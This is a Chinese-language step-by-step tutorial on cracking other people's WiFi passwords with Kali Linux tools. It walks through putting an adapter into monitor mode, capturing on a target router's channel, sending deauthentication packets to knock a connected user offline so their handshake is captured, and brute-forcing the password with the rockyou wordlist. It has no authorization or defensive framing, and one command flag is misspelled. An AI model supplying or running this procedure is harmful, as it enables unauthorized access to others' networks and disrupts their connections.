使用kail破解wifi密码

提前准备一个网卡
如果是vbox，那么将其加入到kali里面

使用

0、查看网卡是否存在

airmon-ng

如果出现wlan0（这个监听的网卡需要是新插入的），那么就开始破解吧

1、开启网卡监听

airmon-ng start wlan0

2、查看ifconfig

ifconfig

3、扫描wifi

airodump-ng wlan0mon

三秒不出现wifi的信息，那么拔出网卡从第0步开始重新弄一次

BSSID为wifi的MAC地址，
PWR为信号强弱程度，数值越小信号越强；
#DATA为数据量，越大使用的人就越多，
CH为信道频率（频道），
ESSID为wifi的名称

4、抓取某个信道

注意，信道频率会经常换，不能把上个步骤的数据下一次用

airodump-ng -w freedom -c 频道数 --bssid 地方路由器mac地址 wlan0mon -ignore-nefative-oneaa

freedom可以换成其他的路径加名称，这里用这个名以后，剩下抓取数据都会以这个名称开头，并且保存在当前的pwd下面
例如

airodump-ng -w freedom -c 1 --bssid 4E:81:50:7B:CA:7F wlan0mon -ignore-nefative-oneaa

这里仅有一个用户连这个wifi了，如果有多个用户，上面图最后会有好几行
我们接下来就是针对这个用户去完成密码破解操作，也就是至少要有一个用户连着这个wifi，我们让他断开，然后让他重新去连，因为我们在监听网络，那么我们就能监听到连接请求的数据包并保存，然后用密码本去一个个的正向哈希测试是否是密码

5、打开新的终端，指定某个用户的mac让其断线

aireplay-ng -0 2 -a 路由器mac地址 -c 用户的mac地址 wlan0mon

运行图

这时候回到监听的那个终端，等到有下面握手的过程就截获并保存成功了

6.0、复制kali自带的密码本到本路径，并解压

cp /usr/share/wordlists/rockyou.txt.gz ./
gzip -d ./rockyou.txt.gz

7、破解

aircrack-ng -w rockyou.txt freedom-*.ivs

如果如下图一样，正常运行了，就说明刚才捕获的包成功了

如果是下图，那么就没有抓取成功，需要重新抓包

如果尝试多个wifi时都用的freedom保存的，运行上述代码时不用担心，freedom-*.ivs虽然运行的是多个wifi，但不用担心抓取多个wifi的包，如果有多个wifi密码的包，在运行上面代码的时候会有提示，让你选择具体哪个wifi，如下图

上面为破解失败图，需要更换密码本，如下图